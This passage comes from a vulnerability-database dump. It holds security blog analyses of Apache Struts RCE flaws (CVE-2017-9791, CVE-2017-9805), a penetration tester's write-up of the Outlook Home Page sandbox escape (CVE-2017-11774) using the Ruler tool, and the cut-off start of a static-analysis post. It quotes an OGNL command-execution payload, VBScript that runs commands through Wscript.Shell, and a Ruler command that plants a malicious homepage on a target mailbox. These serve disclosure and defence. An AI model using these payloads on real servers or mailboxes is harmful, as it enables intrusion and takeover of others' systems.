again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n![CVE-2017-9791 _vulnerable apache struts app_1](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_vulnerable-apache-struts-app_1.png)\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n![CVE-2017-9791 _request to vulnerable page_2](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_request-to-vulnerable-page_2.png)\n\n![CVE-2017-9791 _request to vulnerable page2_2](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_request-to-vulnerable-page2_2.png)\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n![CVE-2017-9791 _exploitation of vulnerable apache struts app_3](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_exploitation-of-vulnerable-apache-struts-app_3.png)\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n![CVE-2017-9791 _securesphere blocking generic RCE_4](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_securesphere-blocking-generic-RCE_4.png)\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n_![CVE-2017-9791 _securesphere blocking generic ognl based RCE_5](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_securesphere-blocking-generic-ognl-based-RCE_5.png)_\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050\u2032)}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, therefore validating the existence of a new custom HTTP header is very straight forward for the attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool on predefined IPs range, facilitating bots to effectively scan a wide range of addresses. Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n![CVE-2017-9791_ognl based RCE URL decoded](https://www.imperva.com/blog/wp-content/uploads/2017/07/CVE-2017-9791_ognl-based-RCE-URL-decoded.png)\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a random generated number \u201c89159112\u201d to match when processing the response message.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts of these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>) this vulnerability does not affect applications using Struts 2.5.x series or applications that do not use the Struts 1 plugin. Meaning that an update is required for those who use the earlier vulnerable patches. It is also mentioned that even if the Struts 1 plugin is available while excluding certain code parts, the application is safe.\n\nAn alternative to the formal advisory, which could be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of attack prior to its release without any modification to systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-13T19:12:31", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-5638"], "modified": "2017-07-13T19:12:31", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:50", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[![Geo-distribution of CVE-2017-9805 attacks WW - 1](https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png)](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[![CVE-2017-9805 - payload by percentage - 2](https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 (Struts 2.5.12). There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-09-08T16:10:08", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:48", "description": "[Ruler](https://github.com/sensepost/ruler) has become a go to tool for us on external engagements, easily turning compromised mailbox credentials into shells. This has resulted in security being pushed forward and Microsoft responding with patches for the two vectors used in Ruler, namely rules and forms. These were patched with [KB3191938](https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017) and [KB4011091](https://support.office.com/en-us/article/Custom-form-script-is-now-disabled-by-default-bd8ea308-733f-4728-bfcc-d7cce0120e94) respectively. \r\n\r\nThis puts us back into the cat and mouse game of attack versus defence, with attack needing to find a new vector. Turns out the rules of three holds true, and where two vulnerabilities lurk, a third surely exists.\r\n\r\ntl;dr There is a new attack built into Ruler. New version of Ruler: https://github.com/sensepost/ruler\r\n\r\nBut you need to read this post to get the exploit ;)\r\n\r\n### The Home Page\r\n\r\n\r\nWhile searching for a new code execution vector, we came across the Outlook Home Page, a legacy feature not many use or are aware of. The homepage allows you to customise the default view for any folder in Outlook. This allows specifying a URL to be loaded and displayed whenever a folder is opened. This URL has to be either HTTP or HTTPS and can be either an internal or external network location.\r\n\r\n![](https://images.seebug.org/1507786914462)\r\n\r\nThe home page can be set through the Outlook GUI\r\n\r\nWhen Outlook loads the remote URL, it will render the contents using ieframe.dll, which means we have numerous options available to us for customising the page. The one thing you want from an Outlook Home Page is the ability to include actual Outlook content into the page. To do this, the Outlook ActiveX controls can be used.\r\n\r\nA simple Outlook Home Page, which will display the message \u201cHello Alex\u201d and then display the contents of the folder would look as follows:\r\n```\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">\r\n<title>Outlook</title>\r\n</head>\r\n<body>\r\n<h1>Hello Alex</h1>\r\n <object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n</body>\r\n</html>\r\n```\r\n\r\nThe magic source being the OutlookViewCtl CLSID embedded as an Object;\r\n```\r\n<object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n```\r\n\r\nAt this point we have a nice home page to display whenever we log into Outlook and we get greeted by name, great.\r\n\r\n### ActiveX Fun\r\n\r\n\r\nSince we have ActiveX controls and our page is hosted in an ieframe, it stands to reason that we should be able to include some vbscript/jscript to interact with the ActiveX control. And it turns out we can.\r\n\r\nThe first thing we did was try and skip straight to the command execution, maybe this ieframe isn\u2019t constrained by the usual security zones and other protections.\r\n```\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">\r\n<title>Outlook</title>\r\n<script id=clientEventHandlersVBS language=vbscript>\r\n\r\n</script>\r\n</head>\r\n<body>\r\n<h1>Hello Alex</h1>\r\n <object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n</body>\r\n</html>\r\n```\r\nWe\u2019ve simply created a window_onload function, which will execute as the page loads, and tasked it to create a new object of type Wscript.Shell and then to execute the notepad application.\r\n\r\nUnfortunately this fails. The ieframe is loaded the typical Internet Explorer security zones, and certain \u201cdangerous\u201d objects can\u2019t be created. Any attempts to access objects such as Wscript.Shell, Scripting.FileSystemObject and others will result in an error and our script will stop executing. Essentially, the only objects we can interact with are ones that pertain directly to Outlook.\r\n\r\n![](https://images.seebug.org/1507786997871)\r\n\r\nAccess is denied when trying to create blacklisted objects\r\n\r\nAt this point we went down a long rabbit hole of trying to get around this limitation by exploring the objects that are accessible. One of those being MSXML2.DOMDocument, and here we tried to use some XSL transforms to get code execution however this also failed with the same message, \u201cActiveX component can\u2019t create object\u201d. As it turns out, the sandboxing applies to all scripting inside the ieframe, no matter how many objects down you go.\r\n\r\nNot wanting to give up, we revisited what we knew. We had ActiveX, we had custom vbscript and we could interact with certain ActiveX controls, Outlook specific controls being one subset of those. This means we are able to directly interact with the ActiveX control already embedded into the page. This is simply done by directly referencing the Object:\r\n```\r\nSet Application = ViewCtl1\r\n```\r\n\r\nNow that we have a \u201chandle\u201d the the ActiveX control, we can make use of functions and access objects belonging to that control. Here [MSDN](https://msdn.microsoft.com/en-us/vba/outlook-vba/articles/viewctl-object-outlook-view-control) comes in handy, remember, documentation is your friend. Consulting the MSDN docs, we find the OutlookApplication property, which according to the documentation \u201cReturns an object that represents the container object for the control.\u201d We can then access this with:\r\n```\r\nSet Application = ViewCtl1.OutlookApplication\r\n```\r\nWe now have a \u201chandle\u201d to the Application object for Outlook, and again we need to find what objects and methods are available to us. Back to MSDN.\r\n\r\nOne of the available methods is the CreateObject method. This method allows us to create an automation object of a specific class, just like the CreateObject usually used directly in VBScript.\r\n```\r\n Set Application = ViewCtl1.OutlookApplication\r\n Set cmd = Application.CreateObject(\"Wscript.Shell\")\r\n cmd.Run(\"notepad\")\r\n```\r\n\r\nAnd this worked, suddenly notepad popped up on the screen. It turns out that we now have a handle into an object outside of the ieframe sandbox. So we are back in the land of unrestricted vbscript. At this point exploitation becomes relatively trivial.\r\n\r\nOur new home page can now be defined as:\r\n```\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">\r\n<title>Outlook</title>\r\n<script id=clientEventHandlersVBS language=vbscript>\r\n\r\n\r\n</script>\r\n</head>\r\n\r\n<body>\r\n <h1> Hello Alex </h1>\r\n <object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n</body>\r\n</html>\r\n```\r\n\r\nI reported this escape from the sandbox to MSFT and it was assigned [CVE-2017-11774](https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774) and patched in the October updates.\r\n\r\nAnother thing about bug hunting, if you\u2019ve thought of it, so has someone else. And just like Outlook forms, it turns out someone else was doing the same research. Again Nick Landers ([@monoxgas](https://twitter.com/monoxgas)) came across the same issue a little while after me, and pointed out a slightly different version of the attack; he made use of window.external to get a handle to the OutlookApplication, rather than using the ActiveX Outlook viewctrl. This still works, as OutlookApplication has been whitelisted for use in the ieframe.\r\n```\r\nSub window_onload()\r\n Set oApp = window.external.OutlookApplication\r\n Set s = oApp.CreateObject(\"Wscript.Shell\")\r\n s.Run(\"notepad\")\r\n End Sub\r\n```\r\n \r\n\r\n### Remote Exploit\r\n\r\n\r\nThis was great, a third method for getting code exec in Outlook. The only problem at this point was that it was still manual. How to turn this into an attack that can be conducted easily through Ruler?\r\n\r\nThis meant we had to go back to our trusted [MFCMapi](https://mfcmapi.codeplex.com/) and find where the home page value is stored and if this is synchronised through Exchange. Since we set the home page on the inbox, the properties of this folder were the obvious place to look for any changes.\r\n\r\n![](https://images.seebug.org/1507787137301)\r\n\r\nThe homepage is stored in the PR_FOLDER_WEBVIEWINFO property\r\n\r\nThe home page is stored in the PR_FOLDER_WEBVIEWINFO property (http://schemas.microsoft.com/mapi/proptag/0x36DF0102) which is an undocumented binary structure. Fortunately, the creators of MFCMapi had reversed this structure and MFCMapi translated the various fields for us.\r\n\r\n![](https://images.seebug.org/1507787165200)\r\n\r\nMFCMapi smartview decodes the binary object for us\r\n\r\nAt this point we had all the information required to add this to Ruler. Since Ruler already has all the MAPI functions required to open a folder, set the properties on a folder and then synchronise these, it took about 30 minutes to add the attack. Not too bad.\r\n\r\nThe main technical part was simply issuing a \u201cSetProperties\u201d request with the PR_FOLDER_WEBVIEWINFO property modified to point to our custom URL.\r\n\r\n### Ruler Homepage\r\n\r\n\r\nThe new version of Ruler now has homepage support, so grab the \u201c[EkoParty](https://ekoparty.org/)\u201d release from the github [releases](https://github.com/sensepost/ruler/releases) (or the [source code](https://github.com/sensepost/ruler) of course).\r\n\r\nTo use the new function couldn\u2019t be simpler. First things first, create your homepage .html page, using the example earlier in this post, you\u2019ll need to swap out \u201cnotepad\u201d for your command, so be creative. This needs to be hosted on a webserver, it doesn\u2019t matter where.\r\n\r\nTo set the home page via Ruler:\r\n```\r\n./ruler --email target@pew.com homepage add --url https://gist.githubusercontent.com/staaldraad/c7b857e9bd6fd332f6f1bd01a2160266/raw/16fb7bb5aac443f4541dd0557062445d128b9813/outlookHomepageRCE.html\r\n```\r\nAs simple as that. The home page can be viewed and deleted using the \u201cdisplay\u201d and \u201cdelete\u201d functions respectively, just as you would for forms or rules.\r\n\r\n![](https://images.seebug.org/1507787264492)\r\n\r\nAttack Attack\r\n\r\nThe [Ruler wiki](https://github.com/sensepost/ruler/wiki/Homepage) has also been updated with all the necessary bits.\r\n\r\nThe vedio:\r\nhttps://sensepost.com/img/pages/blog/2017/outlook-home-page-another-ruler-vector/homepage.mp4?_=1\r\n\r\n### Trigger\r\n\r\n\r\nYou might be wondering at this stage, \u201chow do I trigger my shell?\u201d, well you don\u2019t. Outlook does this for you. The home page, once set, will be triggered when the folder is refreshed. This is usually triggered when the user navigates out of the inbox, for example views \u201csent items\u201d and navigates back into the inbox. Or Outlook is restarted.\r\n\r\nOutlook needs to be notified that the folder has changed and needs to be refreshed. Ruler will try and force this by creating a hidden folder in the Inbox. This changes the last modified date on the folder, property changes don\u2019t, signalling to Outlook that a refresh is need. When the user navigates away from the inbox and back, the home page will refresh and the exploit will trigger. This folder will be deleted when you delete the home page using Ruler.\r\n\r\nThis does have the downside of not allowing you to easily trigger the homepage straight away, but you gain a stealthy persistence method. I can also recommend you build some \u201cshell checks\u201d into your exploit, as the home page gets cached by Outlook, so the exploit may trigger even after you have unset the home page value. Otherwise, if you like multiple shells from a single host, leave it as is.\r\n\r\n### Defence\r\n\r\n\r\nTo defend against this you have multiple options, but the primary one is, apply the [patch (KB4011162)](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774). With this patch Microsoft have completely removed the \u2018home page\u2019 feature from Outlook. By killing off legacy features they are successfully reducing the attack surface and protecting end-users.\r\n\r\nGood architecture and sound security practices go a long way to preventing this, and any attack via Outlook. Ensure 2FA/MFA is deployed for user accounts and password best practices are followed. Monitoring breaches and identifying employee accounts that are present in those breaches goes a long way to making attackers lives harder. If your employees used their corporate account on a breached site, reset their password, people love reusing credentials.\r\n\r\nDetection of this attack has also been added to NotRuler and you can easily detect this with:\r\n```\r\n./notruler --mailboxes organisationList.txt --username exchadm homepage\r\n```\r\nWe wrote a [blog post detailing NotRuler](https://sensepost.com/blog/2017/notruler-turning-offence-into-defence/) a little while back. You can get NotRuler from: https://github.com/sensepost/notruler", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "seebug", "title": "Outlook Home Page \u2013 Another Ruler Vector", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96659", "id": "SSV:96659", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:02:40", "description": "In this post I'll describe how I customized a standard lgtm query to find a remote code execution vulnerability in [Apache Struts](https://struts.apache.org/). A more general announcement about this vulnerability [can be found here](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement). It has been assigned [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805), a security bulletin can be found here on the Struts website, and details of version 2.5.13 of Apache Struts that addresses this vulnerability [are available here](https://struts.apache.org/announce.html). Due to the severe nature of this vulnerability, a couple of details (including a working exploit) have been omitted from this post; this information will be added in a few weeks' time.\r\n\r\nWe strongly advise users of Struts to upgrade to the latest version to mitigate this security risk.\r\n\r\nThe vulnerability I discovered is a result of unsafe deserialization in Java. Multiple similar vulnerabilities have come to light in recent years, after Chris Frohoff and Gabriel Lawrence discovered a deserialization flaw in Apache Commons Collections that can lead to arbitrary code execution. Many Java applications have since been affected by such vulnerabilities. If you'd like to know more about this type of vulnerability, the lgtm documentation page on this topic is a good place to start.\r\n# Detecting unsafe deserialization in Struts #\r\n\r\nlgtm identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection.\r\n\r\nThis query detects common ways through which user-controlled data flows to a deserialization method. However, some projects use a slightly different approach to receive remote user input. For example, Apache Struts uses the ContentTypeHandler interface. This converts data into Java objects. Since implementations of this interface usually deserialize the data passed to them, every class that implements this interface is potentially of interest. The standard QL query for detecting unsafe deserialization of user-controlled data can easily be adapted to recognize this additional method for processing user input. This is done by defining a custom data source.\r\n\r\nIn this case, we are interested in data flowing from the toObject method, which is defined in the ContentTypeHandler interface:\r\n\r\n void toObject(Reader in, Object target);\r\n\r\nThe data contained in the first argument in that is passed to toObject should be considered tainted: it is under the control of a remote user and should not be trusted. We want to find places where this tainted data (the source) flows into a deserialization method (a sink) without input validation or sanitization.\r\n\r\nThe QL DataFlow library provides functionality for tracking tainted data through various steps in the source code. This is known as taint tracking. For example, data gets tracked through various method calls:\r\n\r\n IOUtils.copy(remoteUserInput, output); // output is now also tainted because the function copy preserves the data.\r\n\r\nTo make use of the taint tracking functionality in the DataFlow library, let's define the in argument to ContentTypeHandler.toObject(...) as a tainted source. First, we define how the query should recognize the ContentTypeHandler interface and the method toObject.\r\n\r\n\t/** The ContentTypeHandler Java class in Struts **/\r\n\tclass ContentTypeHandler extends Interface {\r\n\t 